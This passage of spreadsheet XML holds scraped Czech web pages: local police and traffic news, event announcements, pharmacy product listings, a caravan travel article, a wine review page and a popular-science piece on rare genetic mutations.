výsledky měření rychlosti v tomto úseku jen potvrdily, že si tu řidiči s překračováním rychlostních limitů starosti příliš nedělají. Radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 z nich, přičemž se zjištěné hodnoty většinou pohybovaly na devadesátce od 120 kilometrů za hodinu výše," uvedla Baláková. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. Právě jim policisté zabavili řidičský průkaz a jejich přestupek oznámili do správního řízení. "V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině, a byl navíc pod vlivem alkoholu," dodala mluvčí policie. Mezi další zjištěné prohřešky při čtvrteční preventivní akci patřilo nebezpečné předjíždění v místech, kde to zakazuje dopravní značka, nebo přes plnou čáru před horizontem. "To kolegové ocenili pětitisícovou pokutou. Někteří řidiči se také 'zapomněli' připoutat bezpečnostním pásem," uvedla Baláková. Silnici podle ní využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje . "Proto je velmi frekventovaná a vysoká rychlost ani další rizikové chování na ni rozhodně nepatří. Dopravní policisté budou tomuto úseku i nadále věnovat zvýšenou pozornost," dodala mluvčí policie. Autor: ČTK Autor ČTK Rubrika transition_slide Domácí</t>
  </si>
  <si>
    <t>20241101_270_3243296312_828a9feaa8537e92deff.html</t>
  </si>
  <si>
    <t>828a9feaa8537e92deff</t>
  </si>
  <si>
    <t>Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru Pracovní nabídky ve stavebnictví Kalendář akcí Aktuální číslo Předplatné Inzerce Hledat na stránkách Konstrukce.cz Vzdělávání Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru Na konferenci KONSTRUKCE 2024 budou přední odborníci diskutovat o budoucnosti oboru autor: (red) Konference KONSTRUKCE 2024 umožní odborníkům na ocelové konstrukce se potkat a prodiskutovat nové technologie a přístupy, jež mohou posunout celý obor kupředu. Konference KONSTRUKCE 2024, která se uskuteční 14. listopadu v Harmony Hotelu ve Špindlerově Mlýně , umožní odborníkům na ocelové konstrukce se potkat a prodiskutovat nové technologie a přístupy, jež mohou posunout celý obor kupředu. Jedním z témat bude využití umělé inteligence při návrhu ocelových přípojů – zrychlí a zpřesní projektování? Program konference je rozdělen do dvou odborných bloků. První okruh se bude věnovat ocelovým konstrukcím v pozemním stavitelství. Nové informace z technické komise České asociace ocelových konstrukcí představí Dalibor Gregor . O poznatky z prohlídek nosných konstrukcí se podělí Jan Mařík z KONSTAT. S analýzou evropského ocelářství vystoupí Jiří Dufek z Ocelářské unie a nový přístup k návrhu ocelových přípojů s podporou umělé inteligence vysvětlí Šimon Racek ze společnosti Allplan Česko. Nebude samozřejmě chybět ani tématika realizací, jako je například nosná ocelová konstrukce Průmyslového paláce v Praze nebo požadavky na bezpečnost práce při montáži ocelových konstrukcí a technologií v Německu . Druhý blok bude věnován ocelovým mostům na železnici, silnici nebo dálnici. K této problematice vystoupí Jiří Hlavatý , Ředitelství silnic a dálnic ČR a Jiří Krouský ze Správy železnic. Účastníci budou také seznámeni s protikorozní ochranou ocelových konstrukcí železničních mostů nebo nejnovějšími realizacemi – lávkou pro pěší v železniční stanici Pardubice hlavní nádraží. „To je však jen zlomek, inspirativních přednášek je mnohem více. Vždy nabízíme velmi pestrý program, abychom vytvořili platformu pro všechny, kteří se chtějí vzdělávat, sdílet zkušenosti a sledovat aktuální trendy v oblasti ocelových konstrukcí“, doplňuje Monika Odstrčilová z vydavatelství KONSTRUKCE Media, které akci ve spolupráci s Českou asociací ocelových konstrukcí pořádá. Konference je navíc zařazena do systému celoživotního vzdělávání členů ČKAIT a ohodnocena jedním bodem. Vedle přednášek konference nabídne prostor pro networking mezi špičkami z oboru. Součástí akce bude také večerní společenský program s rautem a ochutnávkou vína , kde se předá ocenění „Vynikající diplomová práce v oboru ocelových konstrukcí“. Druhý den konference, 15. listopadu, je tradičně věnován Generálnímu shromáždění České asociace ocelových konstrukcí, které je určené jen pro její členy. Registrace je stále možná! Více se dozvíte ZDE. Termín: 14. listopadu 2024 Místo: Harmony Hotel Špindlerův Mlýn Poslat odkaz emailem Autor: (red)</t>
  </si>
  <si>
    <t>1180</t>
  </si>
  <si>
    <t>635000</t>
  </si>
  <si>
    <t>20241101_271_3243291652_5d6f0ded19300ecc2ed7.html</t>
  </si>
  <si>
    <t>5d6f0ded19300ecc2ed7</t>
  </si>
  <si>
    <t>Biomed Superwhite zubní pasta 100 g</t>
  </si>
  <si>
    <t>Biomed Superwhite zubní pasta 100 g Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Biomed a nejlevnější získáte zdarma! Nabídka končí za Z 97 % přírodní bělicí zubní pasta s BIO certifikací, s přírodním kokosovým olejem, extraktem z ananasu a skořicí pro jemné bělení zubů. Kokosová příchuť. 100g. Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Biomed a nejlevnější získáte zdarma! Nabídka končí za Cena za 100 g: 119,00 Kč Můžete mít za 2 dny v neděli 10. 11. více info Skladem 5+ks V Pilulka Boxu již v neděli 10. 11. od 20:00 Pilulka Expresem již v neděli 10. 11. od 16:00 BIO Markéta S. doporučuje Varianta Biomed Citrus fresh zubní pasta 100 g Užijte si čištění chrupu díky zubní pastě s esenciálními oleji z grepu, citrónu, mandarinky a máty. Nejen, že důkladně vyčistí zuby, ale také díky vůni dodá vašemu tělu pocit uvolněnosti a klidu. 99 % jejího složení je přírodní, takže nemusíte mít výčitky ani vůči životnímu prostředí. Příchuť pasty Skvělá přírodní pasta s černým uhlím Erika Č. doporučuje Varianta Biomed Charcoal zubní pasta 100 g Pasta BIOMED Charcoal dokonale splňuje parametr "za málo peněz, hodně muziky". Její složení je z více než 98% přírodní. Krásně bělí díky obsahu černého uhlí. Tento fakt ocení většina, hlavně milovníci kávy (jako já), případně vína aj. Pozitivně působí také na zubní sklovinu, obsahuje totiž hydroxyapatit vápenatý, který je známý jako tzv. tekutá zubní sklovina. Pasta je navíc celkově šetrná k zubní sklovině, neobsahuje fluoridy. Při čistění zubů mě nejvíc zaujala její chuť, která je příjemná a svěží. Použití je široké, můžeme bělit zuby celé rodince. Přírodní Ne tak výrazný bělící účinek Užitečné ( 1 ) Neužitečné ( 1 ) BIOMED ® Superwhite Zubní pasta BIOMED ® Superwhite s kokosovým olejem obsahuje 99 % přírodních složek. Je určena pro šetrné bělení citlivých zubů a perfektně vyčistí zuby již za pár chvil. Všechny zubní pasty BIOMED ® jsou určeny pro rychlé a dokonalé odstranění zubního povlaku, ochranu proti zubnímu kazu, zpevnění zubní skloviny, péči o dásně a dlouhotrvající svěží dech. Šetrně bělí citlivé zuby Neobsahuje fluorid Přírodní složky pro nejlepší výsledky Každý produkt BIOMED ® je jedinečný a obsahuje individuální soubor 12 a více aktivních přírodních složek, který pomáhá dosáhnout co nejlepších výsledků. Kokosový olej a výtažek ze skořice Pomáhá zklidňovat dásně a dodává pastě jedinečnou pikantní chuť Extrakty z papáji a ananasu Odstraňují plak a šetrně leští sklovinu Extrakty z plantain banánu a listů břízy Pomáhají zklidňovat dásně a mají šetrný čisticí efekt Hydroxyapatit vápníku a L-Arginin Remineralizují a posilují zubní sklovinu BIOMED ® Superwhite neobsahuje: Fluorid Chlorhexidin Triklosan a silná antiseptika SLES Parabeny Agresivní bělicí a abrazivní složky Ekologický a bezpečný produkt Účinnost produktů BIOMED ® je prokázána studiemi in vitro prováděnými v laboratoři CELLnTEC Advanced Cell Systems AG ve Švýcarsku . Neobsahují uhličitan vápenatý (křída), který může poškodit sklovinu, a hydroxymethylglycinát sodný, o kterém je známo, že způsobuje alergie. Zubní pasty BIOMED ® jsou certifikovány dle standardu „BIORIUS“ pro přírodní kosmetické výrobky. Certifikace Biorius Firma BIORIUS vyhodnocuje podklady o surovinách a na základě této analýzy stanoví procento „přírodních“ nebo „organických“ složek. Produkty oceněny certifikátem „natural certified“ obsahují nejméně 90 % přírodních surovin. Přibližte se přírodě SPLAT – Specialista na péči o ústní dutinu SPLAT je mezinárodní společnost, která je na trhu již více než 20 let. Každý výrobek vytvořený v laboratořích SPLAT je zaměřen na nejefektivnější řešení problémů v péči o ústní dutinu. SPLAT spolupracuje s předními zubními lékaři a odborníky po celém světě. Výsledkem jsou inovativní specializované výrobky. Bioaktivní a profesionální produkty SPLAT obsahují ve svém složení unikátní a exkluzivní inovační komponenty. Přírodní účinné látky, esenciální oleje a výtažky z léčivých rostlin jsou samozřejmou součástí zubních past, ústních vod a ústních pěn SPLAT. Všechny zubní pasty, ústní vody a ústní pěny SPLAT jsou bezpečné a vhodné pro každodenní použití. Žádný výrobek SPLAT neobsahuje syntetická antiseptika, triclosan ani chlorhexidin. Představení BIOMED Superwhite Doporučeno pro děti od šesti let a osoby s citlivými zuby Vhodné pro vegany Složení Aqua, Hydrated Silica, Hydrogenated Starch Hydrolysate, Dicalcium Phosphate Dihydrate, Glycerin, Sodium Coco-Sulfate, Cellulose Gum, Aroma, Zinc Gluconate, Benzyl Alcohol, Mentha Piperita Oil, Menthyl Lactate, Stevia Rebaudiana Leaf Extract, Tetrasodium Glutamate Diacetate, Hydroxyapatite, Arginine, Cocos Nucifera Oil, Cinnamomum Cassia Bark Extract, Decyl Glucoside, Ananas Sativus Fruit Extract, Maltodextrin, Cinnamomum Camphora Bark Oil, Thymus Serpillum Oil, Betula Alba Leaf Extract, Plantago Major Leaf Extract, Sodium Bicarbonate, Populus Tremuloides Bark Extract, Sodium Hydroxide, Helianthus Annuus Seed Oil, Sodium Benzoate, Potassium Sorbate, Limonene. Zkuste také další produkty značky Biomed, které uvidíte v kategoriích Zubní pasty, Ústa a zuby a Paradentóza. Výrobek hodnotilo 135 zákazníků a 99 % z nich by ho doporučilo ostatním. Pokud si nejste jistí výběrem tohoto produktu, zkuste se ještě podívat do kategorie Přírodní zubní pasty.</t>
  </si>
  <si>
    <t>47930</t>
  </si>
  <si>
    <t>48660</t>
  </si>
  <si>
    <t>20241101_272_3243291932_4803cfa5daa51be390b5.html</t>
  </si>
  <si>
    <t>4803cfa5daa51be390b5</t>
  </si>
  <si>
    <t>Lactacyd Girl ultra jemný intimní mycí gel 200 ml</t>
  </si>
  <si>
    <t>Lactacyd Girl ultra jemný intimní mycí gel 200 ml Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Wartner, Lactacyd, Compeed, Paranit, Panthenol a nejlevnější získáte zdarma! Nabídka končí za Lactacyd Girl je intimní mycí gel, který umožňuje extrémně jemné mytí přizpůsobené delikátní a citlivé dívčí pokožce. Bez mýdla, bez alkoholu . Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Wartner, Lactacyd, Compeed, Paranit, Panthenol a nejlevnější získáte zdarma! Nabídka končí za Cena za 10 ml: 7,45 Kč Můžete mít zítra více info 4ks skladem V Pilulka Boxu již zítra od 20:00 Pilulka Expresem již v pondělí 11. 11. od 13:00 Dostupné na Napsat hodnocení Pro malé slečny Šetrná intimní hygiena pro malé slečny. Mycí gel Lactacid Girl umožňuje extrémně jemné mytí přizpůsobené delikátní a citlivé pokožce dívčích intimních partií. Hypoalergenní složení s přírodní kyselinou mléčnou a šťávou z Aloe vera. Bez mýdla, bez alkoholu . Vhodné od 3 let až do první menstruace. Určeno pro denní intimní hygienu dívek ve věku od tří let Bez mýdla, bez alkoholu Zklidňuje a hydratuje S výtažkem z broskve a Aloe vera Testováno dermatology a pediatry Lactacyd Produkty Lactacyd zaručují dokonalou specifickou péči o intimní partie. Obsahují kyselinu mléčnou, která obnovuje a udržuje přirozeně mírně kyselé prostředí intimních částí, a pomáhá je tak chránit před záněty. Podporují také přirozené hodnoty pH v dané oblasti, takže nedráždí sliznice a odpovídají přirozenému prostředí. Použití Ke každodennímu mytí intimních partií. Po použití důkladně opláchněte vodou. V případě podráždění přípravek přestaňte používat. Složení Kyselina mléčná, výtažek z broskve, výtažek z Aloe vera. Neobsahuje mýdlo ani alkohol . Vyzkoušejte také ostatní výrobky značky Lactacyd, které naleznete v kategoriích Kosmetika, Intimní přípravky a Tělová kosmetika. Produkt je nyní ve slevě 6 %. Pokud si nejste jistí výběrem tohoto produktu, zkuste se ještě podívat do kategorie Intimní mycí emulze a gely. EAN 8594060896083 Značka Lactacyd Velikost balení 200 ml Věk &amp;gt;3 let Forma Gel Pro Pro děti Pouze pro ženy Cesta podání Dermálně - na pokožku Originální název Lactacyd Girl ultra jemný intimní mycí gel 200ml Nejlepší akce a slevy ve vašem e-mailu</t>
  </si>
  <si>
    <t>20241101_273_3243663186_7bbe5944d8e92f45df3a.html</t>
  </si>
  <si>
    <t>7bbe5944d8e92f45df3a</t>
  </si>
  <si>
    <t>Nejzajímavější karavanové destinace, které byste měli navštívit letos</t>
  </si>
  <si>
    <t>Nejzajímavější karavanové destinace, které byste měli navštívit letos 01.11.2024 Redakce Karavanování se stalo nejen populární formou trávení volného času, ale také způsobem objevování skrytých krás světa. Pro majitele obytných aut a karavanů je cestování za hranice každodenní rutiny jedinečným dobrodružstvím. Tento článek se zaměří na fascinující destinace, které slibují nezapomenutelné zážitky a překvapení pro všechny romantiky na cestách. A co víc, ukáže vám, proč byste právě letos měli vyrazit na českou i evropskou silnici. Skryté poklady v přírodě Mezi favority mnoha karavanistů se nesporně nachází Nationalpark Berchtesgaden v Německu , který láká nejen úchvatnou přírodou, ale také širokou nabídkou kempování. Uprostřed majestátných Alp najdete nejen klidné kempovací plochy, ale také množství turistických tras pro všechny úrovně. Během jízdy po tyto malebné oblasti je však dobré mít na paměti zajímavý fakt: v oblasti se nachází nejhlubší jezero Německa , které má nedotčenou modrou vodu a je obklopené fascinujícími skalními útvary. Tento přírodní klenot vás oslní svým klidem a krásou, kterou je těžké nalézt jinde. Pro milovníky moře je ideálním místem česká Máchova jezera, které se nachází v chráněném kraji. Poblíž jezera se můžete těšit na rozmanité kempinkové možnosti, od rustikálních stanových úprav až po plně vybavené karavanové stání s přírodními stromy kolem. Oblast nabízí nádherné přírodní scenérie a možnost vodních sportů, což přitahuje velký počet turistů. Historická města v okolí jsou dalšími lákadly. Když se zaseknete mezi stromy, budete mít pocit, že jste v pohádce. Cestování a kultura na jedné cestě Jednou z nejnádhernějších destinací je malebná oblast Toskánska v Itálii . Tato romantická část země láká karavanisty svým vinicemi, olivovými háji a malebnými vesničkami, které jako by vypadly z obrázků. Toskánsko nabízí širokou škálu kempů a tradičních agriturismi, ve kterých si můžete vychutnat výbornou místní kuchyni a víno . Zajímavostí je, že oblast je domovem pro více než 300 kempů, což poskytuje obrovský výběr pro každého karavanistu, ať už preferuje luxus nebo jednoduchost. Podobně inspirativní jsou i kempovací místa ve Francii , především v oblasti Provence . Tato malebná krajina je známá svými levandulovými poli, ačkoli květiny blooming představují jen jeden aspekt její krásy. Karavanisté se mohou těšit na úchvatné pohledy, historické památky a jedinečné trhy, kde lze zakoupit místní produkty. Co vás však možná překvapí, je fakt, že v listopadu zde probíhá slavnost vína , kdy místní vinice otevřou své brány pro návštěvníky, a ti mohou ochutnat čerstvě lisovaná vína přímo z produkce. Karavanisté mají jedinečnou možnost spojit dobrodružství a poznávání kultur, které se v každé z destinací liší. Dobrá zpráva pro majitele obytných aut je, že evropské země v posledních letech investovaly do zlepšení infrastruktur pro kempování a parkování karavanů, což činí cestování pohodlnější. Každá zastávka během vaší cesty může přinést nové zážitky a nezapomenutelné vzpomínky, a tak je lákavé vyrazit na silnice a objevovat skryté poklady světa. Za uplynulé roky se karavanový turismus rozšířil a stal se oblíbenou volbou pro mnohé, kteří chtějí vyjít z nastavených kolejí a vrhnout se do objevování. Přestože se na cestách setkáte s mnoha dalšími karavanisty, každá cesta je unikátní a přináší své vlastní příběhy. Karavanování tak nabízí nejen nový úhel pohledu na svět kolem nás, ale i na nás samotné, naše touhy a hledání svobody na cestách. Vydat se na cestu se svým domovem na kolečkách otvírá dveře do nových možností a skrytých pokladů, jež čekají na to, aby je našli právě ti, kteří mají odvahu vyrazit do neznáma. Autor: Redakce</t>
  </si>
  <si>
    <t>20241101_274_3392896299_f7da00fd0cb31589e263.html</t>
  </si>
  <si>
    <t>f7da00fd0cb31589e263</t>
  </si>
  <si>
    <t>V pátek 1.11.&amp;nbsp;se otevřou brány světelného parku ve Žlutých lázních</t>
  </si>
  <si>
    <t>V pátek 1.11.&amp;nbsp;se otevřou brány světelného parku ve Žlutých lázních Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstavu otevře areál od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Foto: Decoled Tags: Praha Autor: Life4you.cz - redakce Rubrika transition_slide PO ČECHÁCH</t>
  </si>
  <si>
    <t>526</t>
  </si>
  <si>
    <t>1.93</t>
  </si>
  <si>
    <t>20241101_275_3243317598_3cc53da64ea4946b0f22.html</t>
  </si>
  <si>
    <t>3cc53da64ea4946b0f22</t>
  </si>
  <si>
    <t>Rychlostní excesy na Jičínsku. Policisté zastavili čtyři nezodpovědné řidiče</t>
  </si>
  <si>
    <t>Rychlostní excesy na Jičínsku. Policisté zastavili čtyři nezodpovědné řidiče close info Zdroj: Policie ČR zoom_in Nejdříve v Úbislavicích policisté změřili 63letého řidiče vozidla Audi , který jel mimo obec 156 km/h, přičemž je zde stanovená maximální rychlost 90 km/h. Dalšího 36letého „piráta“ ve vozidle Ford změřili v Robousích, když opět mimo obec „uháněl“ rychlostí 148 km/h. V odpoledních sobotních hodinách v obci na „50tce“ v Podhorním Újezdu změřili řidiče ve Volkswagenu , který se řítil rychlostí 103 km/h, navíc vozidlo nemělo platnou technickou prohlídku. Posledního řidiče zkontrolovali opět v Úbislavicích, když mimo obec jel rychlostí 155 km/h. Krimi Všichni řidiči se na výzvu policistů podrobili orientační dechové zkoušce na alkohol s negativním výsledkem. Všem řidičům policisté zadrželi řidičské oprávnění a zakázali další jízdu. Ve správním řízení jim hrozí pokuta od 7 do 25 tisíc korun a zákaz řízení od 6 do 18 měsíců. Autor: Tomáš Cerman Autor person Tomáš Cerman Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>6020</t>
  </si>
  <si>
    <t>3960</t>
  </si>
  <si>
    <t>20241101_276_3265415083_ec07f36c7177ead824d6.html</t>
  </si>
  <si>
    <t>ec07f36c7177ead824d6</t>
  </si>
  <si>
    <t>Víno Veltlínské zelené (Flower Line) 2014, pozdní sběr, Vinařství Mikrosvín Mikulov</t>
  </si>
  <si>
    <t>Víno Veltlínské zelené (Flower Line) 2014, pozdní sběr, Vinařství Mikrosvín Mikulov /100 11. 8. 2024 „Tento merlot v polosladkém provedení také převyšuje většinu vzorků z našeho "léta s růžovým". Na to, že je polosladký, je chuťově pěkně výrazný a tóny lesního ovoce se neztrácejí ve zbytkovém cukru. Poměrně dlouhé je i doznívání.“ /100 4. 6. 2023 „ Víno světle žluté barvy se zelenkavým nádechem s intenzivní vůní růží a koření. Chuť je středně plná s tóny pomerančů a broskve, doplněná o šťavnatou kyselinku. Dochuť je středně dlouhá s kořenitým závěrem.“ /100 30. 4. 2024 „Pro mě dnes prototyp letního červeného. Višně, hořká čokoláda, káva, příjemně vyšší tříslo i kyselinka, přitom vše harmonické.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241101_277_3243274399_133ef6dfc4716f7ff906.html</t>
  </si>
  <si>
    <t>133ef6dfc4716f7ff906</t>
  </si>
  <si>
    <t>Slavnost svatého Martina přinese husí speciality, mladé víno i muziku</t>
  </si>
  <si>
    <t>Slavnost svatého Martina přinese husí speciality, mladé víno i muziku 0 17 Centrum kultury a vzdělávání Moravská Ostrava (CKV) připravuje i letos tradiční Slavnost svatého Martina . Konat se bude 9. listopadu ve Vile Hanse Ulricha na Sokolské třídě 26 a v jejím okolí. Program startuje v 11:00 hodin. „Slavnost svatého Martina se letos bude konat ve vile teprve podruhé. Loni se sem přesunula z Masarykova náměstí a zdá se, že šlo o dobrý tah. Svatý Martin je opředen mnoha legendami a s jeho svátkem se pojí různé pranostiky a zvyky. Nejoblíbenější jsou samozřejmě husí hody, spojené s mladým vínem a CKV rozhodně návštěvníky ani v tomto bodě nezklame, “ říká Marcela Mrózková Heříková , ředitelka CKV . Zájemci si mohou v prvním poschodí Vily Hanse Ulricha vychutnat degustaci vín předních moravských vinařů s vybranými lahůdkami, které jim zpříjemní cimbálová muzika Radegast. Tradiční otevření mladého vína se bude konat v Klubu Parník v symbolických 11:00 hodin. „Okolní prostory vily zaplní dobový jarmark plný husích specialit, svatomartinských rohlíčků, koláčů, piva , vybraných vín a dalších pochutin. Pro děti bude připraveno dřevěné vyhlídkové kolo, husí dvůr, černá kuchyně i kovář, “ sdělila Šárka Dospivová, dramaturgyně CKV . Pro zájemce je připraven lampionový průvod v čele s Martinem na bílém koni a jeho gardou, který se vydá k Vile Hase Ulricha v 17:00 hodin z Masarykova náměstí. „ Lampionového průvodu se může účastnit každý s vlastím lampionem, nebo lucernou. U Vily Hanse Ulricha mladému vínu požehná evangelická farářka Ewa Jelinek a defilé pak vyvrcholí šermířským soubojem skupiny Viator, “ doplňuje Dominik Beneš , dramaturg CKV . Slavnost zakončí v 19:00 hodin koncert Jiřího Pavlici &amp;amp; Hradišťanu a návštěvníkům ho zpříjemní sklenka vína . Vstupné na koncert je samostatné. Zájemci ho mohou zakoupit online na webových stránkách CKV nebo na recepci Vily Hanse Ulricha na Sokolské třídě 26. Svatomartinské menu v Klubu Parníku mohou zájemci objednávat na adrese klubparnik.bar@gmail.com nebo na tel. čísle 777 199 127. Zdroj: Centrum kultury a vzdělávání Moravská Ostrava Autor: Monika Ševčíková Autor person Monika Ševčíková Rubrika transition_slide Lifestyle</t>
  </si>
  <si>
    <t>20241101_278_3243229564_ed7a82baeb83cd5bac77.html</t>
  </si>
  <si>
    <t>ed7a82baeb83cd5bac77</t>
  </si>
  <si>
    <t>Zdržení na šestnáctce: kvůli bouračce na křižovatce se u Mělníka jezdí kyvadlově</t>
  </si>
  <si>
    <t>Zdržení na šestnáctce: kvůli bouračce na křižovatce se u Mělníka jezdí kyvadlově Jak Deníku potvrdil policejní mluvčí Pavel Truxa, na silnici I/16, na křižovatce nedaleko Hořína , se v pátek před půl jedenáctou stala dopravní nehoda. Srazily se tam škodovka jednapadesátileté řidičky a mercedes sedmačtyřicetiletého řidiče. Následkem bouračky nejsou žádná vážná zranění. V místě nehody ale platí dopravní omezení, doprava je tam řízena kyvadlově. Mělnicko Příčinou nehody bylo pravděpodobně nedání přednosti v jízdě. Okolnosti, které se ke srážce vedly, jsou předmětem dalšího vyšetřování dopravních policistů. Podle Truxy dechové zkoušky na místě u obou řidičů vyloučily, že by na nehodě měl podíl alkohol . Autor: Petra Špitálská Autor Petra Špitálská</t>
  </si>
  <si>
    <t>20241101_279_3243243418_68c2252f7c351d64e62a.html</t>
  </si>
  <si>
    <t>68c2252f7c351d64e62a</t>
  </si>
  <si>
    <t>Kuriózní genetické mutace: Dávají supersílu i superzrak</t>
  </si>
  <si>
    <t>Kuriózní genetické mutace: Dávají supersílu i superzrak Každý z nás je nositelem přibližně 4 milionů genetických variant. Ale jen málokomu se povede vyhrát v genetické loterii něco opravdu cenného, jako třeba barevnější vidění světa, nádherné řasy nebo silné svaly bez cvičení. Miliony barev Většina z nás dokáže rozeznat asi jeden milion odstínů barev. To ale nejsou hranice lidských možností. Asi 12 % žen vidí svět mnohem barevněji, než si dokážeme představit. Mají superschopnost rozlišit až 100 milionů odstínů. Vděčí za to štědré přírodě, která jim místo obvyklých tří typů receptorů pro barevné vidění na sítnici vytvořila jeden navíc. Zatímco standardní receptory čili čípky vnímají vždy jednu ze základních barev, tedy modrou, červenou a zelenou, čípek navíc k tomu pravděpodobně přidává tóny žlutozeleného spektra. Zároveň se nepředpokládá, že by se tento druh vidění mohl vyskytovat u mužů. Vnímání barev totiž ovlivňují geny na X chromozomu. A jak známo, tak muži mají pouze jeden X chromozom, takže pokud se v genech vyskytnou mutace, tak nemají na rozdíl od žen k dispozici ještě druhou „zdravou“ kopii genů na X chromozomu. Nějaká forma barvosleposti se proto vyskytuje přibližně u 8 % mužů, zatímco u žen je vzácná. Asi 12 % žen vnímá stonásobně více odstínů barev. FOTO: Unsplash.com Svalnatá batolata Některé mutace jsou extrémně vzácné. Patří mezi ně neobvykle svalnatá batolata. Za posledních 20 let byly zaznamenány dva takové případy. Až na to, že oba byli chlapci, mezi nimi nebyla žádná spojitost, nebyli příbuzní a pocházeli z různých zemí. Jejich svalnatost nebyla baculatost, měli přibližně dvakrát tolik svalové hmoty než jejich vrstevníci, a zároveň mnohem méně tuku. V obou případech laboratorní vyšetření ukázala, že za záhadou stojí vrozená odchylka týkající se bílkoviny myostatinu. Ta má tlumit růst svalů. Vrozená odchylka může způsobit nepřiměřený nárůst svalů i u dětí. FOTO: Unsplash.com U jednoho z dětí, nejmenovaného chlapce původem z Německa , tělo myostatin nevytvářelo. Příčinou byla mutace v genu MSTN, kterou chlapec zdědil od obou rodičů. O jeho otci není nic známo, ale matka bývala profesionální sportovkyní. Neobvykle svalnatí jsou údajně také další příbuzní dítěte. Druhý chlapec se jmenuje Liam Hoekstra a pochází z USA . Hladinu myostatinu má sice normální, zato mu chybí funkční receptory na svalových buňkách. Myostatin se na ně proto nedokáže navázat a předat jim pokyn k zastavení růstu…Případy obou chlapců nejsou jen kuriozitou, protože přinášejí inspiraci pro vývoj nové léčby pro pacienty se svalovými dystrofiemi, které se projevují těžkou slabostí a ztrátou svalstva. Foto: Náhledové FOTO: Unsplash.com Napěchovaný milimetr: Nejdetailnější mapa lidského mozku Mravenčí práce a 10 let výzkumu přivedly vědce z Harvardu a Googlu k průlomovému milníku pro neurovědu – detailní 3D mapě lidského mozku. Pochopitelně ne celého. I jeden milimetr krychlový má ale co říct o povaze jedné z nejsložitějších věcí, která ve vesmíru existuje. I po letech soustavného snažení mají neurovědci stále jen mlhavou představu o […] Když jsou obaly věda… PET lahve vítězí v boji za ekologii Někdy svět pro oči nevidí. Co představuje větší emisní problém než auta, lodě nebo letadla? Co zanechává výraznou stopu v životním prostředí, v našich peněženkách a přispívá k sociálním problémům? Potraviny – tedy přesněji plýtvání potravinami. Vědci v projektu Drawdown představili 100 řešení, jak snížit dopad klimatické krize. A jako třetí nejdůležitější řešení, které […] Hyperaktivní Slunce: 